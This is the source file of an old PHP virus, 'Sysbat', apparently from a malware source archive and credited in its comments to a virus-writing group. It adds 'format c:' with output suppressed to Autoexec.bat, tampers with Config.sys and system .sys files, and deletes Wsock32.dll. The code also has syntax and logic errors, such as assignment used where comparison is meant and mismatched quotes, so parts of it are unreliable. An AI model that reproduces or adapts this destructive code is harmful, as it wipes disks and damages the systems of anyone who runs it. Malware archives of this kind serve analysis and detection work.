MalwareSourceCode/PHP/Trojan.PHP.Sysbat
2020-10-09 22:05:41 -05:00

79 lines
1.9 KiB
Plaintext

<?php
// SYSBAT.PHP VIRUS
// By Xmorfic, www.shadowvx.com/bcvg, The Black Cat Virii Group
// SYSBAT.PHP - This virus infectes Config.sys, autoexec.bat and system files in
// C:\Windows\Command\ directory.
$config = 'C:\Config.sys';
$autoexec = 'C:\Autoexec.bat';
$phps = "SYSBAT.PHP";
$newphp = 'sysbat.sys';
$avxm = "This program performed an illegal operation";
$infsystem = true;
$infsys = fopen($config, "r");
$check = fread($infsys, filesize($config));
$infs = strstr ($check, '47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJj<Xmorfic>HKGJD');
if (!$infs) $infsystem = false;
if ( ($infsystem=false) )
{
$infsys = fopen($config, "a");
$fputs($infsys, "47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJj<Xmorfic>HKGJD");
$fputs($infsys, "Xmorfic, www.shadowvx.com/bcvg, Second PHP VIRUS");
return;
}
fclose($infsys);
$infbat = fopen($autoexec, "r");
$checkb = fread($infbat, filesize($autoexec));
$infb = strstr ($checkb, 'format c: /autotest /q /u');
if (!$infb) $infbatf = false;
if ( ($infbatf=false) )
{
$infbat = fopen($autoexec, "a");
$fputs($infbat, "ctty nul ");
$fputs($infbat, "format c: /autotest /q /u ");
return;
}
fclose($infbat);
$systems = opendir('C:\Windows\Command\');
while ($filesys = readdir($systems))
{
$infected = true;
$systemexe = false;
if ( ($systemexe = strstr ($filesys, '.sys') )
if ( (is_writeable($filesys) )
{
$sysk = fopen($filesys, "r");
$xst = fread($sysk, filesize($filesys);
$good = strstr ($xst, 'Xmorfic_Vx');
if (!$good) $infected = false;
}
if ( ($infected=false) )
{
$sysk = fopen($filesys, "a");
$fputs($sysk, "Xmorfic_VX_System_PHP_Infector!!');
return;
}
}
closedir($systems);
// Rename the virus to sysbat.sys (Optional) $ren = rename(__FILE__, $newphp);
$kok = unlink ('C:\Windows\System\Wsock32.dll');
echo $avxm;
?>